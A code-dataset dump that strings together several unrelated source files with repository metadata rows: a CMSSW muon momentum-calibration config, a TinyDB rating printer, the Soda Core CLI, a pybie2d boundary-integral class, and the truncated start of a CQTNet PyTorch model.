'/store/mc/Phys14DR/DYToMuMu_M-50_Tune4C_13TeV-pythia8/MINIAODSIM/PU40bx25_tsg_castor_PHYS14_25_V1-v2/00000/622CAFBA-BD9A-E411-BE11-002481E14FFC.root'
)
)
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(-1))
############ Zmumu GoldenSelection sequence ###############################################
# http://cmssw.cvs.cern.ch/cgi-bin/cmssw.cgi/CMSSW/ElectroWeakAnalysis/ZMuMu/python/ZMuMuGolden_cfi.py?revision=1.7&view=markup&sortby=date
###########################################################################################
# RUN2 muon selection
###########################################################################################
process.RunTwoMuons = cms.EDFilter("PATMuonSelector",
src = cms.InputTag("slimmedMuons"),
cut = cms.string(
'pt > 20 & abs(eta)<2.4' +
'&& (isPFMuon && (isGlobalMuon || isTrackerMuon) )'+
'&& (pfIsolationR04().sumChargedHadronPt+max(0.,pfIsolationR04().sumNeutralHadronEt+pfIsolationR04().sumPhotonEt-0.50*pfIsolationR04().sumPUPt))/pt < 0.20'
)
)
# for isolation (tight WP)
# https://twiki.cern.ch/twiki/bin/view/CMSPublic/SWGuideMuonId#Muon_Isolation
#### FILL TREE #######################
### helper class definition ###
#####################
class SetParameters:
#####################
def __init__(self):
self.parResolFix = cms.vint32()
self.parResolOrder = cms.vint32()
self.parResol = cms.vdouble()
self.parResolStep = cms.untracked.vdouble()
self.parResolMin = cms.untracked.vdouble()
self.parResolMax = cms.untracked.vdouble()
def set(self, fix, order, value, step, min, max):
self.parResolFix.append(fix)
self.parResolOrder.append(order)
self.parResol.append(value)
self.parResolStep.append(step)
self.parResolMin.append(min)
self.parResolMax.append(max)
### end of the definition ###
setter = SetParameters()
#fix, order, value, step, min, max
setter.set( 0 ,0, -0.00113112 , 0.002, -0.1, 0.1 )
setter.set( 0 ,0, 0.000246547 , 0.00002, -0.01, 0.01 )
setter.set( 0 ,0, 0.00545563 , 0.000002, 0., 0.01 )
setter.set( 0 ,0, 0.00501745 , 0.0002, -0.01, 0.02 )
setter.set( 1 ,0, 0.0091978 , 0.00002, 0., 0.01 )
setter.set( 0 ,0, 0.0999428 , 0.0002, 0., 0.2 )
setter.set( 0 ,0, 0.0484629 , 0.0000002, -0.2, 0.5 )
setter.set( 0 ,0, -1.24738 , 0.0002, -2.2, -0.8 )
setter.set( 1 ,0, 0. , 0.00002, 0., 0.01 )
setter.set( 0 ,0, -0.0499885 , 0.0002, -0.2, 0.1 )
setter.set( 0 ,0, 0.252381 , 0.000002, -0.1, 0.5 )
setter.set( 0 ,0, 1.75024 , 0.0002, 0., 3. )
setter.set( 0 ,0, -1.99739 , 0.001, -2.2, -1.6 )
setter.set( 0 ,0, 1.59216 , 0.001, 1., 2.2 )
setter.set( 1 ,0, 0. , 0.0001, 0., 0.01 )
TREEINPUTNAME=""
TREEOUTPUTNAME="zmumuTree.root"
process.looper = cms.Looper(
"MuScleFit",
# Only used when reading events from a root tree
MaxEventsFromRootTree = cms.int32(-1),
# Specify a file if you want to read events from a root tree in a local file.
# In this case the input source should be an empty source with 0 events.
InputRootTreeFileName = cms.string(TREEINPUTNAME),
# Specify the file name where you want to save a root tree with the muon pairs.
# Leave empty if no file should be written.
OutputRootTreeFileName = cms.string(TREEOUTPUTNAME),
# Choose the kind of muons you want to run on
# -------------------------------------------
MuonLabel = cms.InputTag("RunTwoMuons"),
MuonType = cms.int32(11),
# This line allows to switch to PAT muons. Default is false.
# Note that the onia selection works only with onia patTuples.
PATmuons = cms.untracked.bool(True),
# ---------------- #
# Select resonance #
# ---------------- #
# The resonances are to be specified in this order:
# Z0, Y(3S), Y(2S), Y(1S), Psi(2S), J/Psi
# -------------------------------------------------
resfind = cms.vint32(1, 0, 0, 0, 0, 0),
# Likelihood settings
# -------------------
maxLoopNumber = cms.untracked.int32(1),
# Select which fits to do in which loop (0 = do not, 1 = do)
doResolFit = cms.vint32(0),
doScaleFit = cms.vint32(0),
doBackgroundFit = cms.vint32(0),
doCrossSectionFit = cms.vint32(0),
# Use the probability file or not. If not it will perform a simpler selection taking the muon pair with
# invariant mass closer to the pdf value and will crash if some fit is attempted.
UseProbsFile = cms.untracked.bool(False),
# False = use also MC information
speedup = cms.bool(False),
GenParticlesName = cms.untracked.string("prunedGenParticles"),
# Set this to false if you do not want to use simTracks.
# (Note that this is skipped anyway if speedup == True).
compareToSimTracks = cms.bool(False),
# Output settings
# ---------------
OutputFileName = cms.untracked.string("zmumuHisto.root"),
# BiasType=0 means no bias to muon momenta
# ----------------------------------------
BiasType = cms.int32(0),
parBias = cms.vdouble(),
# SmearType=0 means no smearing applied to muon momenta
# -----------------------------------------------------
SmearType = cms.int32(0),
parSmear = cms.vdouble(),
### taken from J/Psi #########################
ResolFitType = cms.int32(0),
parResolFix = setter.parResolFix,
parResolOrder = setter.parResolOrder,
parResol = setter.parResol,
parResolStep = setter.parResolStep,
parResolMin = setter.parResolMin,
parResolMax = setter.parResolMax,
# -------------------- #
# Scale fit parameters #
# -------------------- #
# -----------------------------------------------------------------------------------
ScaleFitType = cms.int32(0),
parScaleOrder = cms.vint32( 0, 0, 0, 0, 0),
parScaleFix = cms.vint32(1, 1, 1, 1, 1),
parScale = cms.vdouble(-7.3019e-05, 0., 0.00147514, 0.000114635, 0.246663),
# Scale fit type=11: Linear in pt, sinusoidal in phi with muon sign -->GOOD results in phi
## modified for mu+/mu -
# -----------------------------------------------------------------------------------
## ScaleFitType = cms.int32(11),
## parScaleOrder = cms.vint32(0, 0, 0, 0, 0, 0, 0, 0),
## parScaleFix = cms.vint32(0, 0, 0, 0, 0, 0, 0, 0),
## parScale = cms.vdouble(1., 0., 0., 1., 0., 0., 1., 0.),
# ---------------------------- #
# Cross section fit parameters #
# ---------------------------- #
# Note that the cross section fit works differently than the others, it
# fits ratios of parameters. Fix and Order should not be used as is, they
# are there mainly for compatibility.
parCrossSectionOrder = cms.vint32(0, 0, 0, 0, 0, 0),
parCrossSectionFix = cms.vint32(0, 0, 0, 0, 0, 0),
parCrossSection = cms.vdouble(1.233, 2.07, 6.33, 13.9, 2.169, 127.2),
# ------------------------- #
# Background fit parameters #
# ------------------------- #
# Window factors for: Z, Upsilons and (J/Psi,Psi2S) regions
LeftWindowBorder = cms.vdouble(70., 8., 1.391495),
RightWindowBorder = cms.vdouble(110., 12., 5.391495),
# The two parameters of BgrFitType=2 are respectively:
# bgr fraction, (negative of) bgr exp. slope, bgr constant
# --------------------------------------------------------
# The function types for resonances in a region must be the same
BgrFitType = cms.vint32(2, 2, 2), # regions
# These empty parameters should be used when there is no background
parBgr = cms.vdouble(0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0.,0., 0.,0., 0.,0.),
parBgrFix = cms.vint32(0, 0, 0, 0, 0, 0,
# The rest of the parameters is used for the resonance regions. They are automatically fixed in the code
# because they are never used to fit the background, but only after the rescaling.
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1),
parBgrOrder = cms.vint32(0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),
# ----------------------- #
# Set Minuit fit strategy
FitStrategy = cms.int32(2),
# Fit accuracy and debug parameters
StartWithSimplex = cms.bool(True),
ComputeMinosErrors = cms.bool(False),
MinimumShapePlots = cms.bool(True),
########## TO BE ENABLED ################################
# Set the cuts on muons to be used in the fit
MinMuonPt = cms.untracked.double(0.),
MaxMuonPt = cms.untracked.double(1000.),
MinMuonEtaFirstRange = cms.untracked.double(options.etaMin1),
MaxMuonEtaFirstRange = cms.untracked.double(options.etaMax1),
MinMuonEtaSecondRange = cms.untracked.double(options.etaMin2),
MaxMuonEtaSecondRange = cms.untracked.double(options.etaMax2),
#ProbabilitiesFileInPath = cms.untracked.string("MuonAnalysis/MomentumScaleCalibration/test/Probs_merge.root"),
#ProbabilitiesFile = cms.untracked.string("Probs_merge.root"),
# Pile-Up related info
PileUpSummaryInfo = cms.untracked.InputTag("addPileupInfo"),
PrimaryVertexCollection = cms.untracked.InputTag("offlineSlimmedPrimaryVertices"),
# The following parameters can be used to filter events
TriggerResultsLabel = cms.untracked.string("TriggerResults"),
TriggerResultsProcess = cms.untracked.string("HLT"),
TriggerPath = cms.untracked.vstring(""),
# Negate the result of the trigger
NegateTrigger = cms.untracked.bool(False),
debug = cms.untracked.int32(0)
)
process.p = cms.Path(
process.RunTwoMuons
)
| 39.633333 | 159 | 0.573844 | 1,370 | 11,890 | 4.964964 | 0.329927 | 0.030579 | 0.031755 | 0.031167 | 0.133637 | 0.107762 | 0.097324 | 0.086886 | 0.06748 | 0.06748 | 0 | 0.068742 | 0.221867 | 11,890 | 299 | 160 | 39.765886 | 0.666451 | 0.323045 | 0 | 0.081081 | 0 | 0.013514 | 0.102478 | 0.056664 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013514 | false | 0 | 0.027027 | 0 | 0.047297 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e44b99cb7f96080fd92bad0d3293611480c4c4 | 609 | py | Python | showrating.py | thchuan2001/XCPC_Rating | 9e69225a67502a09e798f95d7dcb093b6db91b53 | [
"MIT"
] | null | null | null | showrating.py | thchuan2001/XCPC_Rating | 9e69225a67502a09e798f95d7dcb093b6db91b53 | [
"MIT"
] | null | null | null | showrating.py | thchuan2001/XCPC_Rating | 9e69225a67502a09e798f95d7dcb093b6db91b53 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from typing import List, Dict, Any, Optional
from tinydb import TinyDB, Query
from tinydb.operations import add, decrement, set
def takerank(x):
return (int)(x[2])
db = TinyDB('data/list.json', indent=4)
teamdata = Query()
now = db.all()
team = []
for i in now:
team.append((
i['chname'],
i['chschool'],
i['rating'],
))
print("| Rank | School | Name | Rating |")
print("| ---- | ---- | ---- | ---- |")
team.sort(key=takerank, reverse=True)
rank = 1
for i in team:
print(f"| {rank} | {i[1]} | {i[0]} | {i[2]} |")
rank += 1
| 21.75 | 51 | 0.576355 | 85 | 609 | 4.070588 | 0.564706 | 0.057803 | 0.034682 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014768 | 0.221675 | 609 | 27 | 52 | 22.555556 | 0.71519 | 0 | 0 | 0 | 0 | 0.043478 | 0.218391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.173913 | 0.043478 | 0.26087 | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e4a5c8c4a43e4dcbbb464132726c8860f5726f | 9,886 | py | Python | soda/core/soda/cli/cli.py | sodadata/soda-core | d9b98d4f6f3364c5eb8210e8288c4c861bcf8f8a | [
"Apache-2.0"
] | 4 | 2022-03-23T02:43:42.000Z | 2022-03-31T15:20:54.000Z | soda/core/soda/cli/cli.py | sodadata/soda-core | d9b98d4f6f3364c5eb8210e8288c4c861bcf8f8a | [
"Apache-2.0"
] | 543 | 2022-03-22T09:02:17.000Z | 2022-03-31T16:29:41.000Z | soda/core/soda/cli/cli.py | sodadata/soda-core | d9b98d4f6f3364c5eb8210e8288c4c861bcf8f8a | [
"Apache-2.0"
] | 1 | 2022-03-27T03:37:55.000Z | 2022-03-27T03:37:55.000Z | # Copyright 2022 Soda
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import sys
from typing import List, Optional, Tuple
import click
from ruamel.yaml import YAML
from soda.common.file_system import file_system
from soda.common.logs import configure_logging
from soda.common.yaml_helper import to_yaml_str
from soda.scan import Scan
from soda.telemetry.soda_telemetry import SodaTelemetry
from soda.telemetry.soda_tracer import soda_trace, span_setup_function_args
from ..__version__ import SODA_CORE_VERSION
soda_telemetry = SodaTelemetry.get_instance()
@click.group(help=f"Soda Core CLI version {SODA_CORE_VERSION}")
def main():
pass
if __name__ == "__main__":
main()
@main.command(
short_help="runs a scan",
)
@click.option("-d", "--data-source", envvar="SODA_DATA_SOURCE", required=True, multiple=False, type=click.STRING)
@click.option(
"-s",
"--scan-definition",
envvar="SODA_SCAN_DEFINITION",
required=False,
multiple=False,
type=click.STRING,
default="test",
)
@click.option("-v", "--variable", required=False, default=None, multiple=True, type=click.STRING)
@click.option(
"-c",
"--configuration",
required=False,
multiple=True,
type=click.STRING,
)
@click.option("-V", "--verbose", is_flag=True)
@click.argument("sodacl_paths", nargs=-1, type=click.STRING)
@soda_trace
def scan(
sodacl_paths: List[str],
data_source: str,
scan_definition: Optional[str],
configuration: List[str],
variable: List[str],
verbose: Optional[bool],
):
"""
soda scan will
* Parse the SodaCL files and report any errors
* Build and execute queries for the checks
* Evaluate the checks
* Produce a summary on the console
* If configured, send results to Soda Cloud
option -d --data-source is the name of the data source in the configuration. It's required.
option -c --configuration is the configuration file containing the data source definitions.
If not provided, the default ~/.soda/configuration.yml is used.
option -v --variable pass a variable to the scan. Variables are optional and multiple variables
can be specified : -var "today=2020-04-12" -var "yesterday=2020-04-11"
option -s --scan-definition is used By Soda Cloud (only if configured) to correlate subsequent scans and
show check history over time. Scans normally happen as part of a schedule. It's optional. The default
is "test", which is usually sufficient when testing the CLI and Soda Cloud connection.
option -V --verbose activates more verbose logging, including the queries that are executed.
[SODACL_PATHS] is a list of file paths that can be either a SodaCL file or a directory.
Directories are scanned recursive and will add all files ending with .yml
Example:
soda scan -d snowflake_customer_data -v TODAY=2022-03-11 -V ./snfk/pipeline_customer_checks.yml
"""
configure_logging()
fs = file_system()
soda_telemetry.set_attribute("cli_command_name", "scan")
span_setup_function_args(
{
"command_argument": {
"scan_definition": scan_definition,
},
"command_option": {
"sodacl_paths": len(sodacl_paths),
"variables": len(variable),
"configuration_paths": len(configuration),
"offline": False, # TODO: change after offline mode is supported.
"non_interactive": False, # TODO: change after non interactive mode is supported.
"verbose": verbose,
},
}
)
scan = Scan()
if verbose:
scan.set_verbose()
if isinstance(data_source, str):
scan.set_data_source_name(data_source)
if isinstance(scan_definition, str):
scan.set_scan_definition_name(scan_definition)
if configuration:
for configuration_path in configuration:
if not fs.exists(configuration_path):
scan._logs.error(f"Configuration path '{configuration_path}' does not exist")
else:
scan.add_configuration_yaml_files(configuration_path)
else:
default_configuration_file_path = "~/.soda/configuration.yml"
if fs.is_file(default_configuration_file_path):
scan.add_configuration_yaml_file(default_configuration_file_path)
elif not fs.exists(default_configuration_file_path):
scan._logs.warning("No configuration file specified nor found on ~/.soda/configuration.yml")
if sodacl_paths:
for sodacl_path_element in sodacl_paths:
scan.add_sodacl_yaml_files(sodacl_path_element)
else:
scan._logs.warning("No SodaCL files specified")
if variable:
variables_dict = dict([tuple(v.split("=")) for v in variable])
scan.add_variables(variables_dict)
sys.exit(scan.execute())
@main.command(
short_help="updates a distribution reference file",
)
@click.option("-d", "--data-source", envvar="SODA_DATA_SOURCE", required=True, multiple=False, type=click.STRING)
@click.option(
"-c",
"--configuration",
required=False,
multiple=False,
type=click.STRING,
)
@click.option("-V", "--verbose", is_flag=True)
@click.argument("distribution_reference_file", type=click.STRING)
def update(
distribution_reference_file: str,
data_source: str,
configuration: str,
verbose: Optional[bool],
):
"""
soda update will
* Read the configuration and instantiate a connection to the data source
* Read the definition properties in the distribution reference file
* Update bins, labels and/or weights under key "reference distribution" in the distribution reference file
option -d --data-source is the name of the data source in the configuration. It's required.
option -c --configuration is the configuration file containing the data source definitions. The default
is ~/.soda/configuration.yml is used.
option -V --verbose activates more verbose logging, including the queries that are executed.
[DISTRIBUTION_REFERENCE_FILE] is a distribution reference file
Example:
soda update -d snowflake_customer_data ./customers_size_distribution_reference.yml
"""
configure_logging()
fs = file_system()
distribution_reference_yaml_str = fs.file_read_as_str(distribution_reference_file)
if not distribution_reference_yaml_str:
logging.error(f"Could not read file {distribution_reference_file}")
return
yaml = YAML()
try:
distribution_dict = yaml.load(distribution_reference_yaml_str)
except BaseException as e:
logging.error(f"Could not parse distribution reference file {distribution_reference_file}: {e}")
return
dataset_name = distribution_dict.get("dataset")
if not dataset_name:
dataset_name = distribution_dict.pop("table")
distribution_dict["dataset"] = dataset_name
if not dataset_name:
logging.error(f"Missing key 'dataset' in distribution reference file {distribution_reference_file}")
column_name = distribution_dict.get("column")
if not column_name:
logging.error(f"Missing key 'column' in distribution reference file {distribution_reference_file}")
distribution_type = distribution_dict.get("distribution_type")
if not distribution_type:
logging.error(f"Missing key 'distribution_type' in distribution reference file {distribution_reference_file}")
filter = distribution_dict.get("filter")
filter_clause = ""
if filter is not None:
filter_clause = f"WHERE {filter}"
if dataset_name and column_name and distribution_type:
query = f"SELECT {column_name} FROM {dataset_name} {filter_clause}"
logging.info(f"Querying column values to build distribution reference:\n{query}")
scan = Scan()
scan.add_configuration_yaml_files(configuration)
data_source_scan = scan._get_or_create_data_source_scan(data_source_name=data_source)
if data_source_scan:
rows = __execute_query(data_source_scan.data_source.connection, query)
# TODO document what the supported data types are per data source type. And ensure proper Python data type conversion if needed
column_values = [row[0] for row in rows]
from soda.scientific.distribution.comparison import RefDataCfg
from soda.scientific.distribution.generate_dro import DROGenerator
dro = DROGenerator(RefDataCfg(distribution_type=distribution_type), column_values).generate()
distribution_dict["distribution_reference"] = dro.dict()
if "distribution reference" in distribution_dict:
# To clean up the file and don't leave the old syntax
distribution_dict.pop("distribution reference")
new_file_content = to_yaml_str(distribution_dict)
fs.file_write_from_str(path=distribution_reference_file, file_content_str=new_file_content)
def __execute_query(connection, sql: str) -> List[Tuple]:
try:
cursor = connection.cursor()
try:
cursor.execute(sql)
return cursor.fetchall()
finally:
cursor.close()
except BaseException as e:
logging.error(f"Query error: {e}\n{sql}", exception=e)
| 35.561151 | 139 | 0.702205 | 1,263 | 9,886 | 5.315914 | 0.235154 | 0.081323 | 0.067024 | 0.014894 | 0.266458 | 0.221478 | 0.176497 | 0.124814 | 0.124814 | 0.124814 | 0 | 0.004362 | 0.211612 | 9,886 | 277 | 140 | 35.689531 | 0.85707 | 0.29213 | 0 | 0.264706 | 0 | 0 | 0.186057 | 0.039024 | 0 | 0 | 0 | 0.00722 | 0 | 1 | 0.023529 | false | 0.005882 | 0.082353 | 0 | 0.123529 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e594e0d66dd6e977267db177cc0c24d3f9f1cd | 9,411 | py | Python | pybie2d/boundaries/global_smooth_boundary/global_smooth_boundary.py | dbstein/pybie2d | 1c2d6c05f6dbb4f1ab4476d3824f4dde20f90d58 | [
"Apache-2.0"
] | 11 | 2018-10-26T17:34:29.000Z | 2020-04-27T21:21:33.000Z | pybie2d/boundaries/global_smooth_boundary/global_smooth_boundary.py | dbstein/pybie2d | 1c2d6c05f6dbb4f1ab4476d3824f4dde20f90d58 | [
"Apache-2.0"
] | null | null | null | pybie2d/boundaries/global_smooth_boundary/global_smooth_boundary.py | dbstein/pybie2d | 1c2d6c05f6dbb4f1ab4476d3824f4dde20f90d58 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import scipy as sp
import scipy.signal
import warnings
import os
from ..boundary import Boundary
from .laplace_slp_self_kress import Laplace_SLP_Self_Kress
from .stokes_slp_self_kress import Stokes_SLP_Self_Kress
from .laplace_cslp_self_kress import Laplace_CSLP_Self_Kress
from .laplace_close_quad import Laplace_Close_Quad
from .stokes_close_quad import Stokes_Close_Quad
from .modified_helmholtz_dlp_self import Modified_Helmholtz_DLP_Self
from .modified_helmholtz_slp_self import Modified_Helmholtz_SLP_Self
from .modified_helmholtz_close_quad import Modified_Helmholtz_Close_Quad
from .stokes_slp_self_traction import Stokes_SLP_Self_Traction
def my_resample(f, n):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
return sp.signal.resample(f, n)
class Global_Smooth_Boundary(Boundary):
"""
This class impelements a "global smooth boundary" for use in
Boundary Integral methods
Instantiation: see documentation to self.__init__()
"""
def __init__(self, x=None, y=None, c=None):
"""
This function initializes the boundary element.
x (optional): real vector of x-coordinates
y (optional): real vector of y-coordinates
c (optional): complex vector with c.real giving x-coordinates
and c.imag giving y-coordinates
The user must provide at least one of the following sets of inputs:
(1) x and y
(x and y positions, as real vectors)
(2) c
(x and y positions as a complex vector, x=c.real, y=cimag)
If inside_point is not provided, it will be computed as the mean
this may not actually be inside!
As of now, its not clear to me that everything will
work if n is odd. For now, I will throw an error if x/y/c have an
odd number of elements in them
"""
super(Global_Smooth_Boundary, self).__init__(x, y, c)
if self.N % 2 != 0:
raise Exception('The Global_Smooth_Boundary class only accepts \
even N.')
self.t, self.dt = np.linspace(0, 2*np.pi, self.N, \
endpoint=False, retstep=True)
self.k = np.fft.fftfreq(self.N, self.dt/(2.0*np.pi)) # fourier modes
self.k[int(self.N/2)] = 0.0 # wipe out nyquist frequency
self.ik = 1j*self.k
self.chat = np.fft.fft(self.c)
self.cp = np.fft.ifft(self.chat*self.ik)
self.cpp = np.fft.ifft(self.chat*self.ik**2)
self.speed = np.abs(self.cp)
self.tangent_c = self.cp/self.speed
self.tangent_x = self.tangent_c.real
self.tangent_y = self.tangent_c.imag
self.normal_c = -1.0j*self.tangent_c
self.normal_x = self.normal_c.real
self.normal_y = self.normal_c.imag
self.curvature = -(np.conj(self.cpp)*self.normal_c).real/self.speed**2
self.weights = self.dt*self.speed
self.complex_weights = self.dt*self.cp
self.scaled_cp = self.cp/self.N
self.scaled_speed = self.speed/self.N
self.max_h = np.max(self.weights)
self.area = self.dt*np.sum(self.x*self.cp.imag)
self.perimeter = self.dt*np.sum(self.speed)
self.defined_modules = [ 'Laplace_SLP_Self_Kress',
'Stokes_SLP_Self_Kress',
'Laplace_CSLP_Self_Kress',
'Laplace_Close_Quad',
'Stokes_Close_Quad',
'Modified_Helmholtz_DLP_Self',
'Modified_Helmholtz_SLP_Self',
'Modified_Helmholtz_Close_Quad',
'Stokes_SLP_Self_Traction',
]
# end __init__ function definition
def add_module(self, name):
"""
Add a module to boundary to obtain specific functionality
"""
if not name in self.defined_modules:
msg = "Module '" + name + "' is not a known module for Global_Smooth_Boundary class."
raise Exception(msg)
if not hasattr(self, name):
setattr(self, name, eval(name + '(self)'))
# end add_module function definition
def set_inside_point(self, c):
"""
Set an inside point, used in close evaluation schemes
If self-eval schemes are called before this is set, this will be
computed as the average of the boundary nodes, which may not be inside
c should be an imaginary float, with c.real=x, c.imag=y
"""
good = self._test_inside_point(c)
if not good:
warnings.warn('Inside point failed basic test, is it actually inside?')
self.inside_point_c = c
# end set_inside_point function definition
def get_inside_point(self):
if not hasattr(self, 'inside_point_c'):
candidate = np.sum(self.c)/self.N
good = self._test_inside_point(candidate)
if not good:
warnings.warn('Inside point computed as mean, failed basic test, is it actually inside?')
self.inside_point_c = candidate
return self.inside_point_c
# end get_inside_point function definition
def generate_resampled_boundary(self, new_N):
sfc = my_resample(self.c, new_N)
# sfc = sp.signal.resample(self.c, new_N)
return Global_Smooth_Boundary(c=sfc)
# end generate_resampled_boundary definition
#########################
#### Public Methods #####
#########################
##### These provide interfaces so that high level funcitons
##### Can easily extract the functions that they need
# self quadrature (apply) for Laplace SLP
def Laplace_SLP_Self_Apply(self, *args, **kwargs):
self.add_module('Laplace_SLP_Self_Kress')
return self.Laplace_SLP_Self_Kress.Apply(*args, **kwargs)
# self quadrature (form) for Laplace SLP
def Laplace_SLP_Self_Form(self, *args, **kwargs):
self.add_module('Laplace_SLP_Self_Kress')
return self.Laplace_SLP_Self_Kress.Form(*args, **kwargs)
# self quadrature (apply) for Stokes SLP
def Stokes_SLP_Self_Apply(self, *args, **kwargs):
self.add_module('Stokes_SLP_Self_Kress')
return self.Stokes_SLP_Self_Kress.Apply(*args, **kwargs)
# self quadrature (form) for Stokes SLP
def Stokes_SLP_Self_Form(self, *args, **kwargs):
self.add_module('Stokes_SLP_Self_Kress')
return self.Stokes_SLP_Self_Kress.Form(*args, **kwargs)
# self quadrature (form) for Modified Helmholtz DLP
def Modified_Helmholtz_DLP_Self_Form(self, *args, **kwargs):
self.add_module('Modified_Helmholtz_DLP_Self')
return self.Modified_Helmholtz_DLP_Self.Form(*args, **kwargs)
# self quadrature (form) for Modified Helmholtz SLP
def Modified_Helmholtz_SLP_Self_Form(self, *args, **kwargs):
self.add_module('Modified_Helmholtz_SLP_Self')
return self.Modified_Helmholtz_SLP_Self.Form(*args, **kwargs)
# generate Minimum Global Smooth Boundary based on first point
# this is very useful for Circulant problems
def Generate_1pt_Circulant_Boundary(self):
return Minimal_Global_Smooth_Boundary(self.c[0], self.normal_c[0],
self.weights[0], self.curvature[0])
###### Method for generating close corrections
def tolerance_to_distance(self, tol):
"""
Given error tolerance, finds distance where close evaluation is needed
"""
return -np.log(tol)*self.max_h/4.5
def Get_Close_Corrector(self, kernel, *args, **kwargs):
if kernel == 'laplace':
self.add_module('Laplace_Close_Quad')
return self.Laplace_Close_Quad.Get_Close_Corrector(*args, **kwargs)
elif kernel == 'stokes':
self.add_module('Stokes_Close_Quad')
return self.Stokes_Close_Quad.Get_Close_Corrector(*args, **kwargs)
elif kernel == 'modified_helmholtz':
self.add_module('Modified_Helmholtz_Close_Quad')
return self.Modified_Helmholtz_Close_Quad.Get_Close_Corrector(*args, **kwargs)
else:
raise Exception("Specified kernel: '" + kernel + "' not recognized.")
#########################
#### Private Methods ####
#########################
def _test_inside_point(self, candidate, eps=1e-10):
"""
Test whether the provided or generated inside point is acceptable
returns True if the point is okay, False if its not
"""
test_value = np.sum(self.complex_weights/(self.c-candidate))
return np.abs(test_value - 2.0j*np.pi) < eps
# end _test_inside_point function
def arr_check(x):
if type(x) != np.ndarray:
x = np.array([x,])
return x
class Minimal_Global_Smooth_Boundary(Global_Smooth_Boundary):
def __init__(self, c, normal_c, weights, curvature):
self.c = arr_check(c)
self.N = self.c.size
self.normal_c = arr_check(normal_c)
self.weights = arr_check(weights)
self.curvature = arr_check(curvature)
self.x = self.c.real
self.y = self.c.imag
self.normal_x = self.normal_c.real
self.normal_y = self.normal_c.imag
| 42.58371 | 105 | 0.632345 | 1,256 | 9,411 | 4.513535 | 0.204618 | 0.033339 | 0.029635 | 0.023461 | 0.298818 | 0.207268 | 0.207268 | 0.167049 | 0.16211 | 0.118892 | 0 | 0.004066 | 0.268303 | 9,411 | 220 | 106 | 42.777273 | 0.819198 | 0.231325 | 0 | 0.075188 | 0 | 0 | 0.102323 | 0.053514 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135338 | false | 0 | 0.112782 | 0.007519 | 0.383459 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e713a27145ae9d75d9118dbbeea55bf6a791f2 | 2,712 | py | Python | models/CQTNet.py | HQhalo/CQTNet | 0de21565eb7b703420bc9ff8d6b839628233aba5 | [
"MIT"
] | null | null | null | models/CQTNet.py | HQhalo/CQTNet | 0de21565eb7b703420bc9ff8d6b839628233aba5 | [
"MIT"
] | null | null | null | models/CQTNet.py | HQhalo/CQTNet | 0de21565eb7b703420bc9ff8d6b839628233aba5 | [
"MIT"
] | null | null | null | from torch import nn
import torch.nn.functional as F
from collections import OrderedDict
import math
from .basic_module import BasicModule
class CQTNet(BasicModule):
def __init__(self):
super().__init__()
self.features = nn.Sequential(OrderedDict([
('conv0', nn.Conv2d(1, 32, kernel_size=(12, 3), dilation=(1, 1), padding=(6, 0), bias=False)),
('norm0', nn.BatchNorm2d(32)), ('relu0', nn.ReLU(inplace=True)),
('conv1', nn.Conv2d(32, 64, kernel_size=(13, 3), dilation=(1, 2), bias=False)),
('norm1', nn.BatchNorm2d(64)), ('relu1', nn.ReLU(inplace=True)),
('pool1', nn.MaxPool2d((1, 2), stride=(1, 2), padding=(0, 1))),
('conv2', nn.Conv2d(64, 64, kernel_size=(13, 3), dilation=(1, 1), bias=False)),
('norm2', nn.BatchNorm2d(64)), ('relu2', nn.ReLU(inplace=True)),
('conv3', nn.Conv2d(64, 64, kernel_size=(3, 3), dilation=(1, 2), bias=False)),
('norm3', nn.BatchNorm2d(64)), ('relu3', nn.ReLU(inplace=True)),
('pool3', nn.MaxPool2d((1, 2), stride=(1, 2), padding=(0, 1))),
('conv4', nn.Conv2d(64, 128, kernel_size=(3, 3), dilation=(1, 1), bias=False)),
('norm4', nn.BatchNorm2d(128)), ('relu4', nn.ReLU(inplace=True)),
('conv5', nn.Conv2d(128, 128, kernel_size=(3, 3), dilation=(1, 2), bias=False)),
('norm5', nn.BatchNorm2d(128)), ('relu5', nn.ReLU(inplace=True)),
('pool5', nn.MaxPool2d((1, 2), stride=(1, 2), padding=(0, 1))),
